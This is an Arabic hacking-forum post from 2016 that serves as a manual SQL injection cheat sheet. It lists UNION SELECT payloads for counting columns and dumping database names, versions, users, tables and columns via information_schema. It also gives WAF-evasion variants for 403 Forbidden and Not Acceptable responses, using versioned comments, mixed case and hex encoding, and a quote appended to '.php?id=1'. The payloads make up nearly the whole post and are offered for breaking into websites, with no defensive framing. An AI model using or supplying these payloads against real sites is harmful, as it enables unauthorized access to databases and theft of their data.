قديم 10-14-2016, 01:03 AM   المشاركة رقم: 1
الكاتب
anonymous mohamed
.:: موقوف ::.
المعلومات  
التسجيل: Mar 2015
العضوية: 204345
الدولة: قاعدة اليانات
المشاركات: 13
بمعدل : 0.01 يوميا
الإتصال anonymous mohamed غير متواجد حالياً


المنتدى  
افتراضي اوامر الحقن (sql)

بسم الله الرحمان الرحيم


+==============================+
أمر استخراج عدد الأعمدة
+==============================+
+order+by+
+==============================+
أمر استخراج العامود المصاب
+==============================+
+union+select+
+==============================+
أمر استخراج اسم قاعدة البيانات
+==============================+
Database()
+==============================+
أمر استخراج اصدار قاعدة البيانات
+==============================+
Version()
+==============================+
أمر استخراج يوزر قاعدة البيانات
User()
+==============================+
أمر استخراج الجداول
+==============================+
يوضع هذا الأمر مكان العامود المصاب
+==============================+
group_concat(table_****)
+==============================+
ويوضع هذا الأمر في نهاية الرابط
+==============================+
+from+information_schema.tables+where+table_schema =database()--
+==============================+
أمر استخراج الأعمدة
+==============================+
يوضع هذا الأمر مكان العامود المصاب
+==============================+
group_concat(column_****)
+==============================+
ويوضع هذا الأمر في نهاية الرابط
+==============================+
+from+information_schema.columns+where+table_schem a=database()--
+==============================+
أوامر تخطي Forbidden 403 اثناء استخراج العامود المصاب + استخراج الجداول ولأعمدة

+==============================+
تخطي Forbidden 403 اثناء استخراج العامود المصاب
+==============================+
اضافة الفلتر
+==============================+
/*! */
+==============================+
على كلمة
+==============================+
select
+==============================+
لتصبح بهذا الشكل
+==============================+
/*!select*/
+==============================+
واذا لم تنجح الطريقة العب بكلمة
+==============================+
select
+==============================+
لتصبح بهذا الشكل
+==============================+
/*!SeLeCt*/
+==============================+
احرف سمول وأحرف كابتل
+==============================+
تخطي Forbidden 403 اثناء استخراج الجداول
+==============================+
التعديل بالأمر
+==============================+
select
+==============================+
ليصبح بهذا الشكل
+==============================+
/*!SeLeCt*/
+==============================+
التعديل بالأمر
+==============================+
group_concat(table_****)
+==============================+
ليصبح بهذا الشكل
+==============================+
/*!GrOuP_CoNcAT(table_****)*/
+==============================+
وتعديل الامر
+==============================+
ليصبح بهذا الشكل
+==============================+
+from+information_schema.tables+where+table_schema =database()--
+==============================+
تخطي Forbidden 403 اثناء استخراج الجداول
+==============================+
التعديل بالأمر
+==============================+
select
+==============================+
ليصبح بهذا الشكل
+==============================+
/*!SeLeCt*/
+==============================+
التعديل بالأمر
+==============================+
group_concat(column_****)
+==============================+
ليصبح بهذا الشكل
+==============================+
/*!GrOuP_CoNcAT(column_****)*/
+=============================+
وتعديل الامر
+==============================+
ليصبح بهذا الشكل
+==============================+
+from+information_schema.columns+where+table_schem a=database()--
+==============================+
ليصبح بهذا الشكل
+==============================+
from+information_schema./*!columns*/+where+table_schema=database()--
+==============================+
أوامر تخطي Not Acceptable
+==============================+
تخطي Not Acceptable اثناء استخراج العامود المصاب
+==============================+
اضافة الفلتر
+==============================+
/*! */
+==============================+
على كلمة
+==============================+
select
+==============================+
لتصبح بهذا الشكل
+==============================+
/*!select*/
+==============================+
واذا لم تنجح الطريقة العب بكلمة
+==============================+
select
+==============================+
لتصبح بهذا الشكل
+==============================+
/*!SeLeCt*/
+==============================+
احرف سمول وأحرف كابتل
+==============================+
تخطي
Not Acceptable
اثناء استخراج الجداول
+==============================+
التعديل بالأمر
+==============================+
select
+==============================+
ليصبح بهذا الشكل
+==============================+
/*!SeLeCt*/
+==============================+
التعديل بالأمر
+==============================+
group_concat(table_****)
+==============================+
ليصبح بالشكل دا
+==============================+
/*!GrOuP_CoNcAT(table_****)*/
+==============================+
تخطي Not Acceptable اثناء استخراج الجداول
+==============================+
التعديل بالأمر
+==============================+
select
+==============================+
ليصبح بهذا الشكل
+==============================+
/*!SeLeCt*/
+==============================+
التعديل بالأمر
+==============================+
group_concat(column_****)
+==============================+
ليصبح بالشكل دا
+==============================+
/*!GrOuP_CoNcAT(column_****)*/
+==============================+
أوامر تخطي الحماية من بعض الأوامر
+=============================+
هذا الأمر نضعه مكان العامود المصاب
+==============================+
concat(unhex(hex(concat(table_****,0x3a,column_nam e,0x3a,table_schema))))
+==============================+
وهذا الأمر نضعه في نهاية الرابط
+==============================+
+from+information_schema.columns--
+==============================+
أوامر تخطي عدم ظهور عدد الأعمدة
+==============================+
نقوم باضافة
+==============================+
في نهاية الرابط
+==============================+
واضافة
العلامة التي بين قوسين
+==============================+
(')
+==============================+
بعد
+==============================+
.php?id=1
+==============================+
ليصبح بهذا الشكل
+==============================+
.php?id=1'
+وانتهي
==============================+












عرض البوم صور anonymous mohamed  

موضوع مغلق

مواقع النشر (المفضلة)


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
اوامر اختراق المواقع بثغرة SqL عن طريق الحقن اليدوي яσ¢к нα¢кєя [ SQL-injection ] 40 06-03-2014 10:23 AM
اغلب اوامر الحقن ~~~> لا يفوتك Silent injector [ SQL-injection ] 2 04-02-2014 02:55 PM
اوامر الحقن اليدوي libyan boy [ SQL-injection ] 6 02-06-2013 07:15 PM
مشكلة اوامر الحقن ارجو المساعده killer1993 [ مشاكل وحلول اختراق المواقع ] 2 10-06-2012 11:08 AM
نقأشش .. الحقن الالي +الحقن اليدوي=مميزات عيوب .. لخبراء الحقن sql وهوـوب القصيم [ SQL-injection ] 32 01-23-2012 10:00 PM


الساعة الآن 12:23 AM.


Powered by vBulletin® Version 3.8.3
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.